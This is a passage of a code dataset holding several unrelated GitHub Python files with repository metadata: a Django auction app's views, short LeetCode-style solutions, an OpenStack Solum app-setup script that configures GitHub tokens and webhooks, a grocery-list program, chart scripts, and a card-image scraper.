= request.POST[\"title\"]\n description = request.POST[\"description\"]\n starting_bid = request.POST[\"starting_bid\"]\n image = request.POST[\"image\"]\n category = request.POST[\"category\"]\n author = request.user\n\n starting_bid = int (float(starting_bid) * 100)\n\n AuctionListing.objects.create(title=title,\n description=description,\n starting_bid=starting_bid,\n image=image,\n category=category,\n author=author)\n \n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/create-listing.html\",{\n \"form\": CreateListingForm()\n })\n\ndef view_listing(request, listing):\n if request.method == \"POST\" and request.user.is_authenticated:\n if \"bid\" in request.POST.keys():\n bid_amt = int(float(request.POST[\"bid\"]) *100)\n\n highest_bid = get_highest_bid(listing)\n\n if bid_amt > highest_bid.amount:\n bid = Bid(author=request.user,\n amount=bid_amt,\n listing=AuctionListing.objects.get(title=listing))\n bid.save()\n else:\n messages.error(request, \"Your bid must be higher than the previous bid\")\n\n return HttpResponseRedirect(request.path_info, \n listing)\n elif \"content\" in request.POST.keys():\n content = request.POST[\"content\"]\n listing_object = AuctionListing.objects.get(title=listing)\n\n Comment.objects.create(author=request.user,\n listing=listing_object,\n content=content)\n\n return HttpResponseRedirect(request.path_info, \n listing)\n\n elif not AuctionListing.objects.filter(title=listing):\n return render(request, \"auctions/listing-not-found.html\", {\n \"listing\": listing\n })\n else:\n listing = AuctionListing.objects.get(title=listing)\n\n title = listing.title\n description = listing.description\n category = listing.category\n author = listing.author\n image = listing.image\n\n highest_bid = get_highest_bid(title)\n\n if AuctionListing.objects.get(title=title).winner is not None:\n messages.success(request, \"This auction has been closed.\")\n\n if request.user.is_authenticated:\n on_watchlist = listing not in AuctionListing.objects.filter(watchlist=request.user) \n if request.user == AuctionListing.objects.get(title=title).winner:\n messages.success(request, \"Congratulations! 
You won this auction!\")\n else:\n on_watchlist = False\n\n comments = Comment.objects.filter(listing=listing)\n\n return render(request, \"auctions/listing.html\",{\n \"title\": title,\n \"description\": description,\n \"category\": category,\n \"author\": author,\n \"image\": image,\n \"bid_form\": BidOnItemForm,\n \"highest_bid\": round(highest_bid.amount / 100, 2),\n \"highest_bidder\": highest_bid.author,\n \"on_watchlist\": on_watchlist,\n \"comment_form\": CommentForm,\n \"comments\": comments\n })\n\n@login_required\ndef close_listing(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if request.user == listing_object.author:\n listing_object.winner = get_highest_bid(listing).author\n listing_object.save()\n return HttpResponseRedirect(reverse(\"view-listing\", kwargs={'listing': listing}))\n\n@login_required\ndef watchlist(request):\n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\") \\\n .filter(watchlist=request.user)\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\").filter(watchlist=request.user)):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": listings_list\n })\n\n@login_required\ndef watchlist_add(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if listing_object not in AuctionListing.objects.filter(watchlist=request.user):\n listing_object.watchlist.add(request.user)\n\n return HttpResponseRedirect(reverse(\"watchlist\"))\n\n@login_required\ndef watchlist_remove(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if listing_object in AuctionListing.objects.filter(watchlist=request.user):\n listing_object.watchlist.remove(request.user)\n\n return HttpResponseRedirect(reverse(\"watchlist\"))\n\ndef category_list(request):\n category_list_raw = AuctionListing.objects.values(\"category\").filter(winner=None)\n\n category_list_processed = []\n for category in category_list_raw:\n if category[\"category\"] not in category_list_processed \\\n and len(category[\"category\"]) != 0:\n category_list_processed.append(category[\"category\"])\n\n return render(request, \"auctions/category-list.html\", {\n \"categories\": category_list_processed,\n })\n\ndef category(request, category):\n \n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\").filter(category=category)\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\").filter(category=category)):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n for i, active in enumerate(AuctionListing.objects.values(\"winner\").filter(category=category)):\n listings_list[i][\"closed\"] = AuctionListing.objects.get(title=listings_list[i][\"title\"]).winner is not None\n\n return render(request, \"auctions/category.html\", {\n \"listings\": listings_list,\n \"category\": category\n })\n","repo_name":"blattgoldowo/cs50w-project2","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26305810706","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# 
self.val = x\n# self.next = None\nclass Solution:\n # 先计算两个链表的长度,找出长度差。\n # 然后让指针现在长链表上走出长度差的距离\n def FindFirstCommonNode(self, pHead1, pHead2):\n node1 = pHead1\n node2 = pHead2\n count1 = count2 = 0\n while node1:\n count1 += 1\n node1 = node1.next\n while node2:\n count2 += 1\n node2 = node2.next\n count_dif = count1 - count2\n if count_dif > 0:\n longList = pHead1\n shortList = pHead2\n else:\n count_dif = -count_dif\n longList = pHead2\n shortList = pHead1\n while count_dif:\n longList = longList.next\n count_dif -= 1\n while longList and shortList:\n if longList == shortList:\n return longList\n longList = longList.next\n shortList = shortList.next\n return None\n","repo_name":"czq1994/-offer-python2.7-","sub_path":"两个链表的第一个公共结点.py","file_name":"两个链表的第一个公共结点.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"38901547341","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 717.py\n# @Time : 2019/12/21 22:47\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [717. 1比特与2比特字符](https://leetcode-cn.com/problems/1-bit-and-2-bit-characters/)\n \"\"\"\n @timeit\n def isOneBitCharacter(self, bits: List[int]) -> bool:\n n = len(bits)\n # 总是0结尾\n if n == 1: return True\n if bits[-2] == 0: return True\n if n > 2:\n j = n - 2\n while bits[j] == 1: j -= 1\n return (n - 2 - j) % 2 == 0\n return False\n\nif __name__ == '__main__':\n a = Solution()\n a.isOneBitCharacter([1,0,0])\n a.isOneBitCharacter([1,1,1,0])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/601-900/717.py","file_name":"717.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"75145978491","text":"import argparse\nimport base64\nimport getpass\nimport json\nimport os\nimport random\nimport re\nimport string\nimport tempfile\n\nimport httplib2\nimport six\nimport yaml\n\nfrom solumclient import client as solum_client\nfrom solumclient.common import cliutils\n\n\nSOLUM_API_VERSION = '1'\nCREDENTIALS = {}\nPLAN_TEMPLATE = {\"version\": 1,\n \"name\": \"chef\",\n \"description\": \"chef testy\",\n \"artifacts\": []}\n\n\ndef _get_solum_client():\n args = {}\n args['os_username'] = os.getenv('OS_USERNAME', '')\n args['os_password'] = os.getenv('OS_PASSWORD', '')\n args['os_tenant_name'] = os.getenv('OS_TENANT_NAME', '')\n args['os_auth_url'] = os.getenv('OS_AUTH_URL', '')\n args['solum_url'] = os.getenv('SOLUM_URL', '')\n\n try:\n client = solum_client.get_client(SOLUM_API_VERSION, **args)\n return client\n except Exception as ex:\n print(\"Error in getting Solum client: %s\" % ex)\n exit(1)\n\n\ndef _get_token(git_url):\n # Get an OAuth token with the scope of 'repo' for the user\n if git_url in CREDENTIALS and 'token' in CREDENTIALS[git_url]:\n return CREDENTIALS[git_url]['token']\n\n repo_pat = re.compile(r'github\\.com[:/](.+?)/(.+?)($|/$|\\.git$|\\.git/$)')\n match = repo_pat.search(git_url)\n if match:\n user_org_name = match.group(1)\n repo = match.group(2)\n else:\n print('Failed parsing %s' % git_url)\n exit(1)\n\n full_repo_name = '/'.join([user_org_name, repo])\n username = six.moves.input(\"Username for repo '%s' [%s]: \" %\n (full_repo_name, user_org_name))\n if not username:\n username = user_org_name\n password = getpass.getpass(\"Password: \")\n # TODO(james_li): add support for two-factor auth\n 
CREDENTIALS[git_url] = {}\n CREDENTIALS[git_url]['user'] = username\n CREDENTIALS[git_url]['password'] = password\n CREDENTIALS[git_url]['full_repo'] = full_repo_name\n\n http = httplib2.Http()\n auth = base64.encodestring(username + ':' + password)\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n # 'note' field has to be unique\n note = 'Solum-status-' + ''.join(random.sample(string.lowercase, 5))\n data = {'scopes': 'repo', 'note': note}\n\n # TODO(james_li): make the url configurable\n resp, content = http.request('https://api.github.com/authorizations',\n 'POST', headers=headers,\n body=json.dumps(data))\n\n if resp['status'] == '201' or resp['status'] == '200':\n content_dict = json.loads(content)\n CREDENTIALS[git_url]['token'] = str(content_dict['token'])\n return CREDENTIALS[git_url]['token']\n else:\n print('Failed to get token from Github')\n exit(1)\n\n\ndef _filter_trigger_url(url):\n filtered_url = url\n url_pattern = re.compile(r'^(http://)(.+)')\n match = url_pattern.search(url)\n if match:\n filtered_url = ''.join(['https://', match.group(2)])\n else:\n print('Cannot filter trigger url, to use the original one')\n return filtered_url\n\n\ndef get_planfile(git_uri, app_name, cmd, public):\n plan_dict = dict.copy(PLAN_TEMPLATE)\n plan_dict['name'] = app_name\n plan_dict['description'] = git_uri # Put repo uri as plan desc.\n arti = {\"name\": \"chef\", \"artifact_type\": \"chef\",\n \"content\": {}, \"language_pack\": \"auto\"}\n arti['content']['href'] = git_uri\n if not public:\n arti['content']['private'] = True\n arti['unittest_cmd'] = cmd\n plan_dict['artifacts'].append(arti)\n\n # Create a Github token and insert it into plan file\n for arti in plan_dict['artifacts']:\n arti['status_token'] = _get_token(arti['content']['href'])\n plan_file = tempfile.NamedTemporaryFile(suffix='.yaml',\n prefix='solum_',\n delete=False)\n plan_file.write(yaml.dump(plan_dict, default_flow_style=False))\n plan_file_name = plan_file.name\n plan_file.close()\n return plan_file_name\n\n\ndef create_plan(client, plan_file):\n cmd = ['solum', 'app', 'create', plan_file]\n print(' '.join(cmd))\n with open(plan_file) as definition_file:\n definition = definition_file.read()\n\n plan = client.plans.create(definition)\n fields = ['uuid', 'name', 'description', 'uri']\n data = dict([(f, getattr(plan, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)\n\n if data['uri'] is None:\n print('Error: no uri found in plan creation')\n exit(1)\n\n # get public keys in the case of private repos\n artifacts = getattr(plan, 'artifacts', [])\n for arti in artifacts:\n content = getattr(arti, 'content', {})\n if 'public_key' in content and 'href' in content:\n CREDENTIALS[content['href']]['pub_key'] = content['public_key']\n\n return data['uri']\n\n\ndef create_assembly(client, app_name, plan_uri):\n cmd = ['solum', 'assembly', 'create', app_name, plan_uri]\n print(' '.join(cmd))\n assembly = client.assemblies.create(name=app_name, plan_uri=plan_uri)\n\n fields = ['uuid', 'name', 'description', 'status', 'application_uri',\n 'trigger_uri']\n data = dict([(f, getattr(assembly, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)\n\n trigger_uri = data['trigger_uri']\n if trigger_uri is None:\n print('Error in trigger uri')\n exit(1)\n\n return trigger_uri\n\n\ndef create_webhook(trigger_uri):\n # Create github web hooks for pull requests\n for key in CREDENTIALS.keys():\n user = CREDENTIALS[key]['user']\n password = CREDENTIALS[key]['password']\n auth 
= base64.encodestring(user + ':' + password)\n http = httplib2.Http()\n # TODO(james_li): make this url configurable\n github_url = ('https://api.github.com/repos/%s/hooks' %\n CREDENTIALS[key]['full_repo'])\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n data = {'name': 'web',\n 'events': ['pull_request', 'commit_comment'],\n 'config': {'content_type': 'json',\n 'url': trigger_uri}}\n\n resp, _ = http.request(github_url, 'POST',\n headers=headers,\n body=json.dumps(data))\n\n if resp['status'] != '201' and resp['status'] != '200':\n print(\"Failed to create web hooks\")\n print(\"Make sure you have access to repo '%s'\" % key)\n exit(1)\n\n\ndef add_ssh_keys(args):\n if args.public:\n return\n\n # add public keys\n for key in CREDENTIALS.keys():\n if ('pub_key' in CREDENTIALS[key] and\n CREDENTIALS[key]['pub_key'] is not None):\n user = CREDENTIALS[key]['user']\n password = CREDENTIALS[key]['password']\n auth = base64.encodestring(user + ':' + password)\n http = httplib2.Http()\n if args.user_key:\n # TODO(james_li): make the url configurable\n github_url = 'https://api.github.com/user/keys'\n else:\n github_url = ('https://api.github.com/repos/%s/keys' %\n CREDENTIALS[key]['full_repo'])\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n data = {'title': 'devops@Solum',\n 'key': CREDENTIALS[key]['pub_key']}\n\n resp, _ = http.request(github_url, 'POST',\n headers=headers,\n body=json.dumps(data))\n\n if resp['status'] != '201' and resp['status'] != '200':\n if args.user_key:\n print(\"Failed to add a ssh key to the account %s\" % user)\n else:\n print(\"Failed to add a deploy key to the repo %s\" % key)\n exit(1)\n\n\ndef validate_args(args):\n if len(args.command) == 0 or len(args.git_uri) == 0:\n print(\"Please input for --test-cmd and --git-uri\")\n exit(1)\n\n # try to use a correct git uri\n pat = re.compile(r'github\\.com[:/](.+?)/(.+?)($|/.*$|\\.git$|\\.git/.*$)')\n match = pat.search(args.git_uri)\n if match:\n user_org_name = match.group(1)\n repo = match.group(2)\n if args.public:\n correct_uri = 'https://github.com/%s/%s' % (user_org_name, repo)\n else:\n correct_uri = 'git@github.com:%s/%s.git' % (user_org_name, repo)\n return correct_uri\n else:\n print(\"The input git uri seems not right\")\n if args.public:\n print(\"The correct format is: https://github.com//\")\n else:\n print(\"The correct format is: git@github.com:/.git\")\n exit(1)\n\n\ndef main(args):\n git_uri = validate_args(args)\n client = _get_solum_client()\n plan_file = get_planfile(git_uri, args.app_name, args.command, args.public)\n print('\\n')\n print(\"************************* Starting setup *************************\")\n print('\\n')\n plan_uri = create_plan(client, plan_file)\n add_ssh_keys(args)\n try:\n os.remove(plan_file)\n except OSError:\n print('Cannot remove %s. Skip and move forward...' 
% plan_file)\n\n trigger_uri = create_assembly(client, args.app_name, plan_uri)\n create_webhook(_filter_trigger_url(trigger_uri))\n print('Successfully created Solum plan, assembly and webhooks!')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('app_name', help=\"app name\")\n parser.add_argument('--git-uri', required=True, dest='git_uri',\n help=\"git repo uri\")\n parser.add_argument('--test-cmd', required=True, dest='command',\n help=\"entrypoint to run tests\")\n parser.add_argument('--public', action='store_true', default=False,\n dest='public', help=\"public repo, defaults to False\")\n parser.add_argument('--user-key', action='store_true', default=False,\n dest='user_key', help=\"add SSH key to the user account\"\n \" rather than the repo,\"\n \" defaults to False\")\n\n args = parser.parse_args()\n main(args)\n","repo_name":"openstack/python-solumclient","sub_path":"contrib/setup-tools/solum-app-setup.py","file_name":"solum-app-setup.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"78"} +{"seq_id":"272469526","text":"'''\r\nAuthor: Ben Lehmann\r\nDate: 11/1 - 12/10\r\nFunction: Ask the user to either add item names, or prices or even both\r\n\r\nData Structures: Queues, Map, Stack\r\nAlgorithm: Insertion Sort\r\n\r\n10/28 - Standup #1\r\n11/04 - Standup #2\r\n11/10 - Standup #3\r\n11/17 - Standup #4\r\n\r\n\r\n\r\n'''\r\n\r\n\r\nclass GroceryList: #We create a Stack for the Grocery List, easy to add and remove\r\n def __init__(self):\r\n self.items = []\r\n\r\n def checkEmpty(self): #Check if the item is empty\r\n return self.items == []\r\n\r\n def push(self,item): #We insert the user's item\r\n self.items.insert(0,item)\r\n\r\n def adding(self,item):\r\n self.items.append(item)\r\n\r\n def remove(self): #We remove the user's item\r\n self.items.pop()\r\n\r\n def length(self): #I did not need this, this we to check if the stack is empty\r\n return len(self.items)\r\n\r\nclass Prices: #We create a Queue for Prices\r\n def __init__(self):\r\n self.queue = []\r\n\r\n def is_empty(self):\r\n return self.size() == 0 #Check is queue is empty\r\n\r\n def size(self): #Check the size to see if anything is in there\r\n return len(self.queue)\r\n\r\n def enqueue(self,cost): #With Queues, we enqueue and dequeue, so we user append and pop\r\n self.queue.append(cost)\r\n def dequeue(self):\r\n if len(self.queue) < 1: #If the queue is empty, we can't do anything, but if there is, we remove the front\r\n return None\r\n return self.queue.pop(0)\r\n\r\ndef UserItems(): #This method calls back the Stack Class\r\n grocery = GroceryList()\r\n i = 0\r\n while 1: #We are going to iterate through until the user is done inputing items\r\n i += 1\r\n items = input('Enter item %d: ' % i)\r\n if items == '':\r\n break\r\n grocery.adding(items) #We will use the adding() function from the GroceryList class\r\n print(grocery.items)\r\n addOr = input(\"Do you want to add another or delete? 
Enter 'Add' or 'Delete: \") #We will give the chance of adding or removing from the stack\r\n if(addOr == 'Add'):\r\n added = input('Enter the item')\r\n grocery.adding(added)\r\n return grocery.items\r\n elif(addOr == 'Delete'):\r\n grocery.remove()\r\n return grocery.items\r\n return \"Your List: \" + str(grocery.items)\r\n\r\ndef UserCost(): #We use the Queue list here\r\n cost = Prices()\r\n print(\"Enter your prices and then type '0.0' to finish\")\r\n i = 0\r\n while 1:\r\n i += 1\r\n items = float(input('Enter Price %d: ' % i)) #Most Grocery prices are floats, so I decided to keep these floats\r\n if items == 0.00: #If the user is done, they type in 0.00, which means I have nothing else\r\n break #We break from the loop\r\n cost.enqueue(items)\r\n return(cost.queue)\r\n\r\ndef userTotal(): #Disregard this Method\r\n cost = Prices()\r\n print(\"Enter your prices and then type '0.0' to finish\")\r\n i = 0\r\n while 1:\r\n i += 1\r\n items = float(input('Enter Price %d: ' % i))\r\n if items == 0.00:\r\n break\r\n cost.enqueue(items)\r\n return(cost.queue)\r\n\r\nclass UserAndCost: #I decided to create a map structure to keep user's items and prices\r\n def __init__(self):\r\n self.dic = {}\r\n\r\n def add(self,key,value): #This is how we add items to the map\r\n self[key] = value\r\n\r\n def print_value(self): #We are going to return the map results\r\n print(\"Items------------\")\r\n for k,v in self.dic.items():\r\n print(k + \" : \" + v)\r\n return\r\n\r\n def total(self): #This is totals, disregard\r\n totals = self.dic.values()\r\n print(str(sum(totals)))\r\n\r\ndef combine():\r\n cost_item = UserAndCost() #This is where we add the user's prices and items to the map, using a for loop\r\n user_x = int(input(\"Enter the Number of items: \"))\r\n for x in range(user_x):\r\n item = input('Enter your item: ')\r\n cost = input('Enter your price: ')\r\n cost_item.dic[item] = cost\r\n cost_item.print_value()\r\n\r\n\r\ndef InsertionSort(userList): #I was between Selection Sort or Insertion sort, tried both, tested them and Insertion was better\r\n for i in range(1, len(userList)): #If i in range (1 and the number of items in our list), the current value will be the current index\r\n currentVal = userList[i] #Current val is the current index of the list\r\n pos = i #Position of the list is index i\r\n while pos>0 and userList[pos-1]>currentVal: #If our position is not negative and the previous position of the list is still bigger than current\r\n userList[pos]=userList[pos-1] #We will set our current pos index of the list to the previous index\r\n pos=pos-1\r\n userList[pos] = currentVal\r\n\r\n\r\ndef UserSelection(): #This is the main control, this tells the user everything and what to type in\r\n user = input(\"Do You Want to Enter Prices or Enter Items, Press P for Prices or I for Item or B for Both: \")\r\n if user == 'i':\r\n items = UserItems()\r\n return items\r\n elif user == 'p':\r\n cost = UserCost()\r\n print(cost)\r\n InsertionSort(cost) #We will sort out price, numerically order\r\n print(cost)\r\n return \"Cost $\" + str(sum(cost))\r\n elif user == 'b':\r\n user_items = combine()\r\n print(user_items)\r\n else:\r\n return None\r\n\r\nif __name__ == \"__main__\":\r\n print(UserSelection())","repo_name":"BenLehmann5/FinalProject","sub_path":"FinalProject.py","file_name":"FinalProject.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70514545851","text":"################## 
import session ######################\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#########################################################\n\n################## common session #######################\nplt.rc('font', family='NanumGothic')\ncnt, PNG, UNDERBAR = 0, '.png', '_'\nCHART_NAME = 'brokenLineExam'\nfilename = '../data/주요발생국가주간동향(4월2째주).csv'\n########################################################\n\n############# 지정한 날짜에 대한 꺽은선 그래프 ################\ndata = pd.read_csv(filename, encoding='utf-8', index_col='국가')\nprint(data.columns)\nprint('-'*30)\n\nprint(data)\nprint('-'*30)\n\nchartdata = data['4월06일']\nprint(type(chartdata))\nprint(chartdata)\nprint('-'*30)\n\n# 꺽은선 그래프 그리기\nplt.plot(chartdata, color='blue', linestyle='solid', marker='.')\n\n# y축에서 보여줄 단위\nYTICKS_INTERVAL = 50000\n\n# chartdata내의 최대값보다 조금더 보여주기 위해서 최대값을 구한 것이다\nmaxlim = (int(chartdata.max()/YTICKS_INTERVAL) + 1) * YTICKS_INTERVAL\nprint(maxlim)\n\n# 0 부터 1100전까지 가는데 100씩 증가\nvalues = np.arange(0, maxlim + 1, YTICKS_INTERVAL)\nprint(values)\n\n# y축에 보이는 숫자를 3자리씩 끊어서 ',' 를 삽입해준다\nplt.yticks(values, ['%s' % format(val, ',') for val in values])\n\n# 그래프 배경에 격자 생성\nplt.grid(True)\n\n# 그래프 x 축 라벨\nplt.xlabel('국가명')\n\n# 그래프 y 축 라벨\nplt.ylabel('발생 건수')\n\n# 그래프 제목\nplt.title('4월 6일 코로나 발생 건수')\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n######################################################\n\n######### 날짜별 국가들의 코로나 확진 꺽은선 그래프 ###########\nCOUNTRY = ['스페인','프랑스','독일','중국','영국','이란']\nWHEN = ['4월06일','4월07일','4월08일','4월09일','4월10일']\n\nchartdata = data.loc[COUNTRY, WHEN]\n\n# 행과 열을 변경하기 위해서 전치를 사용한다\nchartdata = chartdata.T\n\nprint(chartdata)\nprint('-'*30)\n\nchartdata.plot(title='Some Title', marker='.', rot=0, legend=True, figsize=(10,6))\n\nplt.grid(True)\nplt.xlabel('일자')\nplt.ylabel('국가명')\nplt.title('일자별 국가 코로나 발생 건수')\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n#########################################################\n\n################## 식당 총금액과 팁 정보 #####################\ntipsfile = '../data/tips.csv'\nmyframe = pd.read_csv(tipsfile)\nprint(type(myframe))\nprint(myframe.columns)\n\n# [:(행), [(열)]]을 의미\ndata_bill = myframe.loc[:, ['total_bill']]\ndata_tip = myframe.loc[:, ['tip']]\n\nfig, ax1 = plt.subplots()\nax1.set_title('결제 금액과 tip(이중축)')\n\nxrange = range(len(myframe))\ncolor = 'tab:red'\nax1.set_ylabel('결제금액', color=color)\n# plot: 2차원을 의미\n# x축과 y축이 필요\n# x축은 myframe의 갯수가 표시, y축은 결제 금액에 대한 값을 표시\nax1.plot(xrange, data_bill, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\n# twinx(): 기존에 사용하던 x축은 그대로 유지하면서 다른 y축에 새로운 값을 추가할 수 있다.(이중축)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('팁(tip)', color=color)\nax2.plot(xrange, data_tip, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nfig.tight_layout()\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n########################################################\nprint('finished')","repo_name":"torvlf/python","sub_path":"example/brokenLineExam.py","file_name":"brokenLineExam.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40366120460","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> List[int]:\n xor = first = 
second = 0\n for num in nums:\n xor ^= num\n one = xor & (-xor)\n for num in nums:\n if one & num:\n first ^= num\n else:\n second ^= num\n return [first, second]\n","repo_name":"StefanRankovic/leetcode","sub_path":"contest/2020/07/single_number_iii.py","file_name":"single_number_iii.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72752720893","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport json\nimport re\nimport os\n\n\ndef example_func():\n result = \"\"\n # output json\n # write file\n with open(\"states.json\", \"w\") as f:\n json.dump(\n result, f, indent=2\n ) # json.dump - write JSON file to local directory from Python object in Python file\n\n write_json_string = json.dumps(\n None, indent=2\n ) # json.dumps - write Python object to JSON string within Python file\n\n # read the output json to check the result\n # read file\n with open(\"states.json\") as f:\n data = json.load(\n f\n ) # json.load - read JSON file from local directory into Python Object in Python file\n read_json_result = json.loads(\n None\n ) # json.loads - read JSON string format file into Python Object within Python file\n\n # html_url = 'https://www.timesjobs.com/candidate/job-search.html?searchType=personalizedSearch&from=submit&txtKeywords=Python&txtLocation='\n # html_text = requests.get(html_url).text\n # soup = BeautifulSoup(html_text, 'lxml')\n # job = soup.find('li', class_='clearfix job-bx wht-shd-bx')\n # print(job)\n\n # read target webpage\n with open(\"home.html\", \"r\") as html_file:\n content = html_file.read()\n\n # Create BeautifulSoup object\n soup = BeautifulSoup(content, \"lxml\")\n\n # get the first target tag\n first_tag = soup.find(\"div\")\n # print(f'first_tag {first_tag}')\n\n # get all target tags\n all_tags = soup.find_all(\"div\", class_=\"top1\")\n print(f\"all tags {all_tags}\")\n\n for tag in all_tags:\n print(tag.find(\"div\", class_=\"div2\").text)\n\n\ndef scrape_page():\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n option_cards = cards[\"option_cards\"]\n\n for option in option_cards:\n img_url = option[\"img_src\"]\n img_data = requests.get(img_url).content\n # filename follows cards' number\n number = option[\"number\"]\n fileName = \"./images/options/\" + number + \".png\"\n # make new directory\n dirname = os.path.dirname(fileName)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n # save file to local directory\n with open(fileName, \"wb\") as f:\n f.write(img_data)\n\n # cards[\"monster_cards\"] = monster_cards\n\n # write effect cards Python list dict to JSON file\n\n # url = (\n # \"https://digimon.neoseeker.com/wiki/Option_cards_in_Digimon_Digital_Card_Battle\"\n # )\n # req = Request(\n # url,\n # headers={\n # \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36\"\n # },\n # )\n # webpage = urlopen(req).open()\n # soup = BeautifulSoup(webpage, \"lxml\")\n # print(soup)\n\n # get the html string\n # page_url = (\n # \"https://digimon.neoseeker.com/wiki/Option_cards_in_Digimon_Digital_Card_Battle\"\n # )\n # html_string = requests.get(page_url).text\n # soup = BeautifulSoup(html_string, \"lxml\")\n # print(soup)\n\n # read cards json file\n # cards = None\n # with open(\"cards.json\") as f:\n # cards = json.load(f)\n # effect_cards = cards[\"effect_cards\"]\n\n # get all image source 
links\n # image_tags = soup.find_all(\"img\")\n # print(f\"image tags count:{len(image_tags)}\")\n # img = image_tags[0]\n # print(img[\"src\"])\n\n # # # loop through all img_urls\n # for i, img in enumerate(image_div):\n # img = image_div.find('img')\n # print(img['src'])\n # # effect_cards[i][\"img_src\"] = img[\"src\"]\n # # # write effect cards Python list dict to JSON file\n # with open(\"effectCards.json\", \"w\") as f:\n # json.dump(effect_cards, f, indent=2)\n\n\ndef addMonsterImageUrls():\n # get the html string\n page_url = \"https://digimon.fandom.com/wiki/Digimon_Digital_Card_Battle/Cards\"\n html_string = requests.get(page_url).text\n soup = BeautifulSoup(html_string, \"lxml\")\n\n # read cards json file\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n monster_cards = cards[\"monster_cards\"]\n effect_cards = cards[\"effect_cards\"]\n\n # get all image source links\n image_urls = soup.find_all(\"img\", class_=\"pi-image-thumbnail\")\n # # loop through all numbers\n numbers = soup.find_all(\"b\")\n for i, img in enumerate(image_urls):\n monster_cards[i][\"img_src\"] = img[\"src\"]\n # # write monster cards Python list dict to JSON file\n with open(\"monsterCards.json\", \"w\") as f:\n json.dump(monster_cards, f, indent=2)\n\n\ndef updateMonsterCardJson():\n # read cards json file\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n with open(\"monsterCards.json\") as f:\n monster_cards = json.load(f)\n\n cards[\"monster_cards\"] = monster_cards\n # write cards master JSON file\n with open(\"cards.json\", \"w\") as f:\n json.dump(cards, f, indent=2)\n # # write monster cards Python list dict to JSON file\n with open(\"monsterCards.json\", \"w\") as f:\n json.dump(monster_cards, f, indent=2)\n # # write effect cards Python list dict to JSON file\n # with open(\"effectCards.json\", \"w\") as f:\n # json.dump(effect_cards, f, indent=2)\n\n\ndef getUniqueEffects():\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n monster_cards = cards[\"monster_cards\"]\n effect_cards = cards[\"effect_cards\"]\n\n effect_master = []\n\n for card in monster_cards:\n if card[\"x_effect\"] != \"None\":\n effects = card[\"x_effect\"].split(\". \")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n if card[\"support\"] != \"None\":\n effects = card[\"support\"].split(\". \")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n for card in effect_cards:\n if card[\"effect\"] != \"None\":\n effects = card[\"effect\"].split(\". 
